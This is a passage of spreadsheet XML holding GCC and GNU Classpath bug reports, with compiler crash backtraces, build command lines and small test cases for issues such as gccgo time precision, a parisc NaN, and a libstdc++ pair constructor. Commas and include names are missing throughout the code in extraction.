0xa0e9a7 _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../src/gcc/rtl-error.c:108
0x83f67b final_scan_insn(rtx_insn* _IO_FILE* int int int*)
        ../../src/gcc/final.c:2981
0x83f927 final(rtx_insn* _IO_FILE* int)
        ../../src/gcc/final.c:2044
0x83fe8f rest_of_handle_final
        ../../src/gcc/final.c:4440
0x83fe8f execute
        ../../src/gcc/final.c:4515
Please submit a full bug report
with preprocessed source if appropriate.
currently reducing build takes 10min ...</t>
  </si>
  <si>
    <t>GCC-66574</t>
  </si>
  <si>
    <t>Time is provided in millisecond precision instead of nanoseconds as described in go documentation</t>
  </si>
  <si>
    <t>Created attachment 35794
testcase demonstrating microsecond precision of time.Now()
According to http://golang.org/pkg/time/#Time
A Time represents an instant in time with nanosecond precision.
The precision provided by gccgo when calling time.Now() is in microseconds not nanoseconds since it invokes gettimeofday to retrieve the time.  If clock_gettime was called instead that would provide nanosecond precision.
A testcase is attached.
This is a mirror of an issue that was reported to the golang issue tracker:  https://github.com/golang/go/issues/11222.</t>
  </si>
  <si>
    <t>boger</t>
  </si>
  <si>
    <t>GCC-61844</t>
  </si>
  <si>
    <t>ICE when building libgcc for sh64 cross-compiler</t>
  </si>
  <si>
    <t>When trying to build a cross-compiler for sh64 with libgcc I get the following error and several others like it (make -j is in operation) during the compiler build:
/data/fedora/cross-gcc/gcc-4.9.0-20140702/sh64-linux-gnu/./gcc/xgcc -B/data/fedora/cross-gcc/gcc-4.9.0-20140702/sh64-linux-gnu/./gcc/ -B/usr/sh64-linux/bin/ -B/usr/sh64-linux/lib/ -isystem /usr/sh64-linux/include -isystem /usr/sh64-linux/sys-include    -g -O2 -mb -O2  -g -O2 -DIN_GCC  -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -DNO_FPSCR_VALUES -w -Wno-sync-nand -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector -Dinhibit_libc  -fpic -DNO_FPSCR_VALUES -w -Wno-sync-nand -I. -I. -I../../.././gcc -I../../../../gcc-4.9.0-20140702/libgcc -I../../../../gcc-4.9.0-20140702/libgcc/. -I../../../../gcc-4.9.0-20140702/libgcc/../gcc -I../../../../gcc-4.9.0-20140702/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o _addvsi3.o -MT _addvsi3.o -MD -MP -MF _addvsi3.dep -DL_addvsi3 -c ../../../../gcc-4.9.0-20140702/libgcc/libgcc2.c -fvisibility=hidden -DHIDE_EXPORTS
../../../../gcc-4.9.0-20140702/libgcc/libgcc2.c: In function â€˜__addvsi3â€™:
../../../../gcc-4.9.0-20140702/libgcc/libgcc2.c:84:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 27 51 52 3 (set (reg:SI 1 r1 [172])
        (mem/c:SI (plus:SI (reg:SI 2 r2)
                (reg:SI 12 r12)) [0  S4 A32])) ../../../../gcc-4.9.0-20140702/libgcc/libgcc2.c:81 260 {*movsi_media}
     (nil))
../../../../gcc-4.9.0-20140702/libgcc/libgcc2.c:84:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:411
0x73b24a _fatal_insn(char const* rtx_def const* char const* int char const*)
        ../../gcc-4.9.0-20140702/gcc/rtl-error.c:109
0x73b26f _fatal_insn_not_found(rtx_def const* char const* int char const*)
        ../../gcc-4.9.0-20140702/gcc/rtl-error.c:120
0x6f2aa0 reload_cse_simplify_operands
        ../../gcc-4.9.0-20140702/gcc/postreload.c:411
0x6f48cc reload_cse_simplify
        ../../gcc-4.9.0-20140702/gcc/postreload.c:181
0x6f48cc reload_cse_regs_1
        ../../gcc-4.9.0-20140702/gcc/postreload.c:220
0x6f4cbb reload_cse_regs
        ../../gcc-4.9.0-20140702/gcc/postreload.c:68
0x6f4cbb rest_of_handle_postreload
        ../../gcc-4.9.0-20140702/gcc/postreload.c:2332
0x6f4cbb execute
        ../../gcc-4.9.0-20140702/gcc/postreload.c:2368
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source stored into /tmp/cce3xHzL.out file please attach this to your bugreport.
The same reduced test that causes bug 61737 to ICE causes this one to ICE.  This can be found here:
    https://gcc.gnu.org/bugzilla/attachment.cgi?id=33082</t>
  </si>
  <si>
    <t>dhowells</t>
  </si>
  <si>
    <t>GCC-52582</t>
  </si>
  <si>
    <t>[4.7 Regression] g++ ICE when compiling qt-4.8.0 with -O2 on PPC (32bit)</t>
  </si>
  <si>
    <t>gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/ppc64-redhat-linux/4.7.0/lto-wrapper
Target: ppc64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --disable-build-with-cxx --disable-build-poststage1-with-cxx --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-linker-hash-style=gnu --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-initfini-array --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --enable-secureplt --with-long-double-128 --build=ppc64-redhat-linux --target=ppc64-redhat-linux --with-cpu=default32
Thread model: posix
gcc version 4.7.0 20120308 (Red Hat 4.7.0-0.19) (GCC)
g++ -c -pipe -Wall -Wreturn-type -fno-strict-aliasing -Wcast-align -Wchar-subscripts -Wformat-security -Wreturn-type -Wno-unused-parameter -Wno-sign-compare -Wno-switch -Wno-switch-enum -Wundef -Wmissingnit-self -fno-stack-protector -O2 -g -pipe -Wall -Wp-D_FORTIFY_SOURCE=2 -fstack-protector --param=ssp-buffer-size=4 -m32 -O2 -fvisibility=hidden -fvisibility-inlines-hidden -D_REENTRANT -fPIC -DQT_SHARED -DJSC=QTJSC -Djscyyparse=qtjscyyparse -Djscyylex=qtjscyylex -Djscyyerror=qtjscyyerror -DWTF=QTWTF -DQT_BUILD_SCRIPT_LIB -DQT_NO_USING_NAMESPACE -DQLALR_NO_QSCRIPTGRAMMAR_DEBUG_INFO -DQT_NO_CAST_TO_ASCII -DQT_ASCII_CAST_WARNINGS -DQT3_SUPPORT -DQT_MOC_COMPAT -DQT_USE_QSTRINGBUILDER -DBUILDING_QT__=1 -DWTF_USE_ACCELERATED_COMPOSITING -DNDEBUG -DBUILDING_QT__ -DBUILDING_JavaScriptCore -DBUILDING_WTF -DWTF_USE_JAVASCRIPTCORE_BINDINGS=1 -DWTF_CHANGES=1 -DNDEBUG -DJS_NO_EXPORT -DQT_NO_DEBUG -DQT_CORE_LIB -D_LARGEFILE64_SOURCE -D_LARGEFILE_SOURCE -I../../mkspecs/linux-g++ -I. -I../../include/QtCore -I../../include -I../3rdparty/javascriptcore/JavaScriptCore -I../3rdparty/javascriptcore -I../3rdparty/javascriptcore/JavaScriptCore/assembler -I../3rdparty/javascriptcore/JavaScriptCore/bytecode -I../3rdparty/javascriptcore/JavaScriptCore/bytecompiler -I../3rdparty/javascriptcore/JavaScriptCore/debugger -I../3rdparty/javascriptcore/JavaScriptCore/interpreter -I../3rdparty/javascriptcore/JavaScriptCore/jit -I../3rdparty/javascriptcore/JavaScriptCore/parser -I../3rdparty/javascriptcore/JavaScriptCore/pcre -I../3rdparty/javascriptcore/JavaScriptCore/profiler -I../3rdparty/javascriptcore/JavaScriptCore/runtime -I../3rdparty/javascriptcore/JavaScriptCore/wrec -I../3rdparty/javascriptcore/JavaScriptCore/wtf -I../3rdparty/javascriptcore/JavaScriptCore/wtf/symbian -I../3rdparty/javascriptcore/JavaScriptCore/wtf/unicode -I../3rdparty/javascriptcore/JavaScriptCore/yarr -I../3rdparty/javascriptcore/JavaScriptCore/API -I../3rdparty/javascriptcore/JavaScriptCore/ForwardingHeaders -I../3rdparty/javascriptcore/JavaScriptCore/generated -I../../include/QtScript -I.rcc/release-shared -I/builddir/build/BUILD/qt-everywhere-opensource-src-4.8.0/src/3rdparty/javascriptcore/WebKit/qt/Api -I../3rdparty/javascriptcore/JavaScriptCore/pcre -I/builddir/build/BUILD/qt-everywhere-opensource-src-4.8.0/src/3rdparty/javascriptcore/JavaScriptCore/tmp -I../3rdparty/javascriptcore/JavaScriptCore -I../3rdparty/javascriptcore/JavaScriptCore/parser -I../3rdparty/javascriptcore/JavaScriptCore/bytecompiler -I../3rdparty/javascriptcore/JavaScriptCore/debugger -I../3rdparty/javascriptcore/JavaScriptCore/runtime -I../3rdparty/javascriptcore/JavaScriptCore/wtf -I/builddir/build/BUILD/qt-everywhere-opensource-src-4.8.0/src/script/../3rdparty/javascriptcore/JavaScriptCore/unicode -I../3rdparty/javascriptcore/JavaScriptCore/interpreter -I../3rdparty/javascriptcore/JavaScriptCore/jit -I../3rdparty/javascriptcore/JavaScriptCore/profiler -I../3rdparty/javascriptcore/JavaScriptCore/wrec -I../3rdparty/javascriptcore/JavaScriptCore/API -I../3rdparty/javascriptcore/JavaScriptCore/bytecode -I../3rdparty/javascriptcore/JavaScriptCore/assembler -I../3rdparty/javascriptcore/JavaScriptCore/generated -I. -Iparser -I.moc/release-shared -o obj/release/JSGlobalData.o ../3rdparty/javascriptcore/JavaScriptCore/runtime/JSGlobalData.cpp
../3rdparty/javascriptcore/JavaScriptCore/runtime/JSGlobalData.cpp: In static member function 'static void QTJSC::JSGlobalData::storeVPtrs()':
../3rdparty/javascriptcore/JavaScriptCore/runtime/JSGlobalData.cpp:92:27: internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>karsten</t>
  </si>
  <si>
    <t>CLASSPATH-22803</t>
  </si>
  <si>
    <t>non-critical exception while running Eclipse 3 on SableVM</t>
  </si>
  <si>
    <t xml:space="preserve">I found the following in Eclipse's .log file:
!ENTRY org.eclipse.core.runtime 4 2 Nov 29 2004 16:07:28.899
!MESSAGE Problems occurred when invoking code from plug-in: org.eclipse.core.runtime.
!STACK 0
java.lang.IllegalArgumentException: Failed to parse integer string
   at java.text.MessageFormat.scanFormat (MessageFormat.java:286)
   at java.text.MessageFormat.applyPattern (MessageFormat.java:333)
   at java.text.MessageFormat.MessageFormat (MessageFormat.java:574)
   at java.text.MessageFormat.MessageFormat (MessageFormat.java:559)
   at java.text.MessageFormat.format (MessageFormat.java:385)
   at org.eclipse.jdt.internal.ui.JavaUIMessages.getFormattedString (JavaUIMessages.java:39)
   at org.eclipse.jdt.internal.ui.JavaUIMessages.getFormattedString (JavaUIMessages.java:35)
   at org.eclipse.jdt.internal.ui.viewsupport.JavaElementLabels.getTypeLabel (JavaElementLabels.java:587)
   at org.eclipse.jdt.internal.ui.viewsupport.JavaElementLabels.getElementLabel (JavaElementLabels.java:353)
   at org.eclipse.jdt.internal.ui.viewsupport.JavaElementLabels.getElementLabel (JavaElementLabels.java:321)
   at org.eclipse.jdt.internal.ui.viewsupport.JavaElementLabels.getTextLabel (JavaElementLabels.java:306)
   at org.eclipse.jdt.internal.ui.viewsupport.JavaUILabelProvider.getText (JavaUILabelProvider.java:152)
   at org.eclipse.jface.viewers.DecoratingLabelProvider.getText (DecoratingLabelProvider.java:115)
   at org.eclipse.jface.viewers.DecoratingLabelProvider.updateLabel (DecoratingLabelProvider.java:215)
   at org.eclipse.jface.viewers.TreeViewer.doUpdateItem (TreeViewer.java:113)
   at org.eclipse.jface.viewers.AbstractTreeViewer$UpdateItemSafeRunnable.run (AbstractTreeViewer.java:86)
   at org.eclipse.core.internal.runtime.InternalPlatform.run (InternalPlatform.java:615)
   at org.eclipse.core.runtime.Platform.run (Platform.java:747)
   at org.eclipse.jface.viewers.AbstractTreeViewer.doUpdateItem (AbstractTreeViewer.java:488)
   at org.eclipse.jface.viewers.StructuredViewer$UpdateItemSafeRunnable.run (StructuredViewer.java:135)
   at org.eclipse.core.internal.runtime.InternalPlatform.run (InternalPlatform.java:615)
   at org.eclipse.core.runtime.Platform.run (Platform.java:747)
   at org.eclipse.jface.viewers.StructuredViewer.updateItem (StructuredViewer.java:1432)
   at org.eclipse.jface.viewers.StructuredViewer.update (StructuredViewer.java:1415)
   at org.eclipse.jface.viewers.StructuredViewer.update (StructuredViewer.java:1342)
   at org.eclipse.jface.viewers.StructuredViewer.handleLabelProviderChanged (StructuredViewer.java:706)
   at org.eclipse.jdt.internal.ui.javaeditor.JavaOutlinePage$JavaOutlineViewer.handleLabelProviderChanged (JavaOutlinePage.java:742)
   at org.eclipse.jface.viewers.ContentViewer$1.labelProviderChanged (ContentViewer.java:74)
   at org.eclipse.ui.internal.decorators.DecoratorManager$1.run (DecoratorManager.java:207)
   at org.eclipse.core.internal.runtime.InternalPlatform.run (InternalPlatform.java:615)
   at org.eclipse.core.runtime.Platform.run (Platform.java:747)
   at org.eclipse.ui.internal.decorators.DecoratorManager.fireListeners (DecoratorManager.java:205)
   at org.eclipse.ui.internal.decorators.DecorationScheduler$2.runInUIThread (DecorationScheduler.java:357)
   at org.eclipse.ui.progress.UIJob$1.run (UIJob.java:96)
   at org.eclipse.swt.widgets.RunnableLock.run (RunnableLock.java:35)
   at org.eclipse.swt.widgets.Synchronizer.runAsyncMessages (Synchronizer.java:106)
   at org.eclipse.swt.widgets.Display.runAsyncMessages (Display.java:2613)
   at org.eclipse.swt.widgets.Display.readAndDispatch (Display.java:2342)
   at org.eclipse.ui.internal.Workbench.runEventLoop (Workbench.java:1435)
   at org.eclipse.ui.internal.Workbench.runUI (Workbench.java:1406)
   at org.eclipse.ui.internal.Workbench.createAndRunWorkbench (Workbench.java:263)
   at org.eclipse.ui.PlatformUI.createAndRunWorkbench (PlatformUI.java:144)
   at org.eclipse.ui.internal.ide.IDEApplication.run (IDEApplication.java:102)
   at org.eclipse.core.internal.runtime.PlatformActivator$1.run (PlatformActivator.java:335)
   at org.eclipse.core.runtime.adaptor.EclipseStarter.run (EclipseStarter.java:273)
   at org.eclipse.core.runtime.adaptor.EclipseStarter.run (EclipseStarter.java:129)
   at java.lang.reflect.Method.invokeNative (Method.java)
   at java.lang.reflect.Method.invoke (Method.java:605)
   at org.eclipse.core.launcher.Main.basicRun (Main.java:183)
   at org.eclipse.core.launcher.Main.run (Main.java:644)
   at org.eclipse.core.launcher.Main.main (Main.java:628)
   at java.lang.VirtualMachine.invokeMain (VirtualMachine.java)
   at java.lang.VirtualMachine.main (VirtualMachine.java:92)
</t>
  </si>
  <si>
    <t>GCC-51765</t>
  </si>
  <si>
    <t>[9/10 Regression] Testsuite ICEs with -flto</t>
  </si>
  <si>
    <t>Created attachment 26251
full testsuite summary
Currently we ICE compiling the following tests on x86_64 when running the
testsuite with RUNTESTFLAGS=--target_board=unix/-flto
FAIL: g++.dg/tm/pr45940-3.C -std=gnu++98 (internal compiler error)
FAIL: g++.dg/tm/pr45940-3.C -std=gnu++98 (test for excess errors)
FAIL: g++.dg/tm/pr45940-3.C -std=gnu++11 (internal compiler error)
FAIL: g++.dg/tm/pr45940-3.C -std=gnu++11 (test for excess errors)
FAIL: g++.dg/tm/pr45940-4.C -std=gnu++98 (internal compiler error)
FAIL: g++.dg/tm/pr45940-4.C -std=gnu++98 (test for excess errors)
FAIL: g++.dg/tm/pr45940-4.C -std=gnu++11 (internal compiler error)
FAIL: g++.dg/tm/pr45940-4.C -std=gnu++11 (test for excess errors)
FAIL: gcc.dg/O16384.c (internal compiler error)
FAIL: gcc.dg/O16384.c (test for excess errors)
FAIL: gcc.dg/pr37106-1.c (internal compiler error)
FAIL: gcc.dg/pr37106-1.c (test for excess errors)
FAIL: gcc.dg/pr43562.c (internal compiler error)
FAIL: gcc.dg/pr43562.c (test for excess errors)
FAIL: gcc.dg/pr43564.c (internal compiler error)
FAIL: gcc.dg/pr43564.c (test for excess errors)
FAIL: gcc.target/i386/funcspec-9.c (internal compiler error)
FAIL: gcc.target/i386/funcspec-9.c (test for excess errors)
FAIL: gcc.target/i386/opt-1.c (internal compiler error)
FAIL: gcc.target/i386/opt-1.c (test for excess errors)
FAIL: gcc.target/i386/opt-2.c (internal compiler error)
FAIL: gcc.target/i386/opt-2.c (test for excess errors)
FAIL: gfortran.dg/alloc_comp_assign_2.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_assign_2.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_assign_3.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_assign_3.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_assign_4.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_assign_4.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_auto_array_2.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_auto_array_2.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_bounds_1.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_bounds_1.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_constructor_1.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_constructor_1.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_constructor_2.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_constructor_2.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_constructor_3.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_constructor_3.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/alloc_comp_constructor_4.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/alloc_comp_constructor_4.f90  -O0  (test for excess errors)
FAIL: gfortran.dg/class_array_7.f03  -O0  (internal compiler error)
FAIL: gfortran.dg/class_array_7.f03  -O0  (test for excess errors)
FAIL: gfortran.dg/class_array_7.f03  -O1  (internal compiler error)
FAIL: gfortran.dg/class_array_7.f03  -O1  (test for excess errors)
...
FAIL: gfortran.dg/class_to_type_1.f03  -O0  (internal compiler error)
FAIL: gfortran.dg/class_to_type_1.f03  -O0  (test for excess errors)
...
FAIL: gfortran.dg/extends_4.f03  -O0  (internal compiler error)
FAIL: gfortran.dg/extends_4.f03  -O0  (test for excess errors)
FAIL: gfortran.dg/pr43808.f90  -O0  (internal compiler error)
FAIL: gfortran.dg/pr43808.f90  -O0  (test for excess errors)
...
FAIL: gfortran.dg/type_to_class_1.f03  -O0  (internal compiler error)
FAIL: gfortran.dg/type_to_class_1.f03  -O0  (test for excess errors)
...
FAIL: gnat.dg/aggr1.adb (internal compiler error)
FAIL: gnat.dg/aggr1.adb (test for excess errors)
I didn't check whether any of them are regressions.  If so please create
individual bugs for them.</t>
  </si>
  <si>
    <t>GCC-23911</t>
  </si>
  <si>
    <t>Failure to propagate constants from a const initializer for _Complex</t>
  </si>
  <si>
    <t>double _Complex *a 
const double _Complex b[10] = {0 1 2 3 4 5 6 7 8 9} 
void 
test (void) 
{ 
  a[0] = b[0] + b[1] 
  a[1] = b[0] + b[1] 
  return 
} 
--&gt; 
 Function test (test) 
test () 
{ 
  double CI.17 
  double CR.16 
  complex double * D.1616 
  complex double * a.0 
: 
  a.0 = a 
  CR.16 = REALPART_EXPR  + REALPART_EXPR  
  CI.17 = IMAGPART_EXPR  + IMAGPART_EXPR  
  REALPART_EXPR  = CR.16 
  IMAGPART_EXPR  = CI.17 
  D.1616 = a.0 + 16B 
  REALPART_EXPR  = CR.16 
  IMAGPART_EXPR  = CI.17 
  return 
} 
CSE later optimizes this but we should do it earlier.</t>
  </si>
  <si>
    <t>GCC-27627</t>
  </si>
  <si>
    <t>__builtin_nanf() doesn't return a _quiet_ nan on parisc</t>
  </si>
  <si>
    <t>hppa-unknown-linux-gnu
configured with: ../src/configure -v
--enable-languages=cc++javafortranobjcobj-c++adatreelang --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
+--without-included-gettext --enable-threads=posix --enable-nls
--program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu
--enable-libstdcxx-debug --enable-java-awt=gtk
+--enable-gtk-cairo
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.1-1.4.2.0/jre --enable-mpfr
--enable-checking=release hppa-linux-gnu 
Hi all
Trying to debug glibc test-float failures on linux parisc it appears that a
place where one pb occures was during:
__real__ res = (float) M_PI_2 - __real__ y //(1)
of '__cacosf (__complex__ float x)'
where __real__ y == nan
The glibc test was failing because resulting of computation (1) is a
_signaling_ nan: the fpsr v bit (i.e. Invalid operation) is set.
Afaik this occures because __real__ y is itself a _signaling_ nan?
And this came from imho casinf() computation hunk:
[snip]
else if (__isinff (__real__ x) || __isinff (__imag__ x))
{
__real__ res = __nanf ()
__imag__ res = __copysignf (HUGE_VALF __imag__ x)
}
[snip]
It seems so that __nanf () precompiled as __builtin_nanf() return a
signaling nan.
I will attach a precompile file of this simple test case:
#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include 
#include 
#include 
#include 
#include 
#include 
#include 
static float
L_nanf (const char *tagp)
{
if (tagp[0] != '\0')
{
char buf[6 + strlen (tagp)]
sprintf (buf NAN(%s) tagp)
return strtof (buf NULL)
}
printf (tagp[0] == '\\0'\n)
return NAN
}
int
main (int argc char **argv)
{
union { unsigned long long l unsigned int sw[2] } s
float res tst
res = L_nanf ()
//printf (res: 0x%x\n (int)res)
tst = 4.0 - res
__asm__(#BannerIn)
/* Get the current status word. */
__asm__ (\n\t
fstd %%fr00(%1)
: =m (s.l)
: r (&amp;s.l)
)
printf (s.sw[0]: 0x%x.\n s.sw[0])
printf (s.sw[0] &gt;&gt; 27: 0x%x.\n (s.sw[0] &gt;&gt; 27))
__asm__(#BannerOut)
return (int)tst
}
reporting well:
tagp[0] == '\0'
s.sw[0]: 0x80000000.
s.sw[0] &gt;&gt; 27: 0x10.
Tx
Joel
PS: compile options for test case:
gcc-4.1: warning: -pipe ignored because -save-temps specified
Using built-in specs.
Target: hppa-linux-gnu
Configured with: ../src/configure -v
--enable-languages=cc++javafortranobjcobj-c++adatreelang --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib --without-i
ncluded-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1
--enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug
--enable-java-awt=gtk --enable-gtk-cairo
--with-java-home=/usr/lib/jvm/java-1.4.2-gcj-4.1-1.4.2.0/jre --enable-mpfr
--enable-checking=release hppa-linux-gnu
Thread model: posix
gcc version 4.1.1 20060511 (prerelease) (Debian 4.1.0-4)
/usr/lib/gcc/hppa-linux-gnu/4.1.1/cc1 -E -quiet -nostdinc -v -I../include -I.
-I/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math -I..
-I../libio -I/CAD/parisc-l
inux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc -I../sysdeps/hppa/elf
-I../libidn/sysdeps/unix -I../linuxthreads/sysdeps/unix/sysv/linux/hppa
-I../linuxthreads/sysdeps/unix/sysv/
linux -I../linuxthreads/sysdeps/pthread -I../sysdeps/pthread
-I../linuxthreads/sysdeps/unix/sysv -I../linuxthreads/sysdeps/unix
-I../linuxthreads/sysdeps/hppa -I../sysdeps/unix/sysv/l
inux/hppa -I../sysdeps/unix/sysv/linux -I../sysdeps/gnu
-I../sysdeps/unix/common -I../sysdeps/unix/mman -I../sysdeps/unix/inet
-I../sysdeps/unix/sysv -I../sysdeps/unix -I../sysdeps/po
six -I../sysdeps/hppa/hppa1.1 -I../sysdeps/wordsize-32
-I../sysdeps/ieee754/flt-32 -I../sysdeps/ieee754/dbl-64 -I../sysdeps/hppa/fpu
-I../sysdeps/hppa -I../sysdeps/ieee754 -I../sysdep
s/generic/elf -I../sysdeps/generic -MD
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math/Nan.d
-MF /CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-li
bc/math/Nan.o.dt -MP -MT
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math/Nan.o
-MQ /CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math/Nan.o
-D__NO_MATH_INLINES -D__LIBC_INTERNAL_MATH_INLINES -DNO_LONG_DOUBLE
-D_Mlong_double_=double -D_LIBC_REENTRANT -DNOT_IN_libc=1 -isystem
/usr/lib/gcc/hppa-linux-gnu/4.1.1/include -isyst
em /CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/debian/include -include
../include/libc-symbols.h Nan.c -std=gnu99 -Wall -Winline -Wstrict-prototypes
-Wwrite-strings -Wno-uninitialize
d -fstrict-aliasing -fno-inline -ffloat-store -fno-builtin -fworking-directory
-O2 -fpch-preprocess -o Nan.i
#include ... search starts here:
#include  search starts here:
../include
.
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math
..
../libio
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc
../sysdeps/hppa/elf
../libidn/sysdeps/unix
../linuxthreads/sysdeps/unix/sysv/linux/hppa
../linuxthreads/sysdeps/unix/sysv/linux
../linuxthreads/sysdeps/pthread
../sysdeps/pthread
../linuxthreads/sysdeps/unix/sysv
../linuxthreads/sysdeps/unix
../linuxthreads/sysdeps/hppa
../sysdeps/unix/sysv/linux/hppa
../sysdeps/unix/sysv/linux
../sysdeps/gnu
../sysdeps/unix/common
../sysdeps/unix/mman
../sysdeps/unix/inet
../sysdeps/unix/sysv
../sysdeps/unix
../sysdeps/posix
../sysdeps/hppa/hppa1.1
../sysdeps/wordsize-32
../sysdeps/ieee754/flt-32
../sysdeps/ieee754/dbl-64
../sysdeps/hppa/fpu
../sysdeps/hppa
../sysdeps/ieee754
../sysdeps/generic/elf
../sysdeps/generic
/usr/lib/gcc/hppa-linux-gnu/4.1.1/include
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/debian/include
End of search list.
/usr/lib/gcc/hppa-linux-gnu/4.1.1/cc1 -fpreprocessed Nan.i -quiet -dumpbase
Nan.c -auxbase-strip
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math/Nan.o
-g -O2 -
Wall -Winline -Wstrict-prototypes -Wwrite-strings -Wno-uninitialized
-std=gnu99 -version -fstrict-aliasing -fno-inline -ffloat-store -fno-builtin
-o Nan.s
GNU C version 4.1.1 20060511 (prerelease) (Debian 4.1.0-4) (hppa-linux-gnu)
compiled by GNU C version 4.1.1 20060511 (prerelease) (Debian 4.1.0-4).
GGC heuristics: --param ggc-min-expand=46 --param ggc-min-heapsize=31137
Compiler executable checksum: e86175deb88d866b27528eee26dfa969
as --traditional-format -V -o
/CAD/parisc-linux/Dpkg/dpkg-work/glibc-2.3.6/build-tree/hppa-libc/math/Nan.o Nan.s
GNU assembler version 2.16.91 (hppa-linux-gnu) using BFD version 2.16.91
20060413 Debian GNU/Linux</t>
  </si>
  <si>
    <t>GCC-51183</t>
  </si>
  <si>
    <t>pair piecewise_construct_t constructor copies</t>
  </si>
  <si>
    <t>Hello
on clc++ someone noticed that the technique used by libstdc++ for pair's piecewise_construct_t constructor calls a (elided) copy constructor. In particular:
#include 
#include 
struct A {
        A()
        A(A const
}
int main(){
        std::pair p { std::piecewise_construct_t() std::make_tuple() std::make_tuple(1) }
}
is rejected by the compiler.</t>
  </si>
  <si>
    <t>GCC-83947</t>
  </si>
  <si>
    <t>[8 Regression] ICE on invalid C++ code with auto: in tsubst_decl at cp/pt.c:13046</t>
  </si>
  <si>
    <t>This appears to be a recent regression. 
$ g++tk -v
Using built-in specs.
COLLECT_GCC=g++tk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.1 20180117 (experimental) [trunk revision 256779] (GCC)
$
$ g++-7.2.0 -c tmp.cpp
tmp.cpp: In instantiation of â€˜auto gâ€™:
tmp.cpp:3:10:   required from here
tmp.cpp:2:23: error: use of â€˜auto f()â€™ before deduction of â€˜autoâ€™
 template  auto g (f)
                       ^
$
$ g++tk -c tmp.cpp
tmp.cpp:2:23: internal compiler error: in tsubst_decl at cp/pt.c:13046
 template  auto g (f)
                       ^
0x86faa0 tsubst_decl
        ../../gcc-source-trunk/gcc/cp/pt.c:13046
0x876996 tsubst(tree_node* tree_node* int tree_node*)
        ../../gcc-source-trunk/gcc/cp/pt.c:13562
0x8749b5 instantiate_template_1
        ../../gcc-source-trunk/gcc/cp/pt.c:18569
0x8749b5 instantiate_template(tree_node* tree_node* int)
        ../../gcc-source-trunk/gcc/cp/pt.c:18625
0x8c81b6 finish_id_expression(tree_node* tree_node* tree_node* cp_id_kind* bool bool bool* bool bool bool bool char const** unsigned int)
        ../../gcc-source-trunk/gcc/cp/semantics.c:3679
0x80a1a2 cp_parser_primary_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:5615
0x817443 cp_parser_postfix_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:7029
0x82087c cp_parser_unary_expression
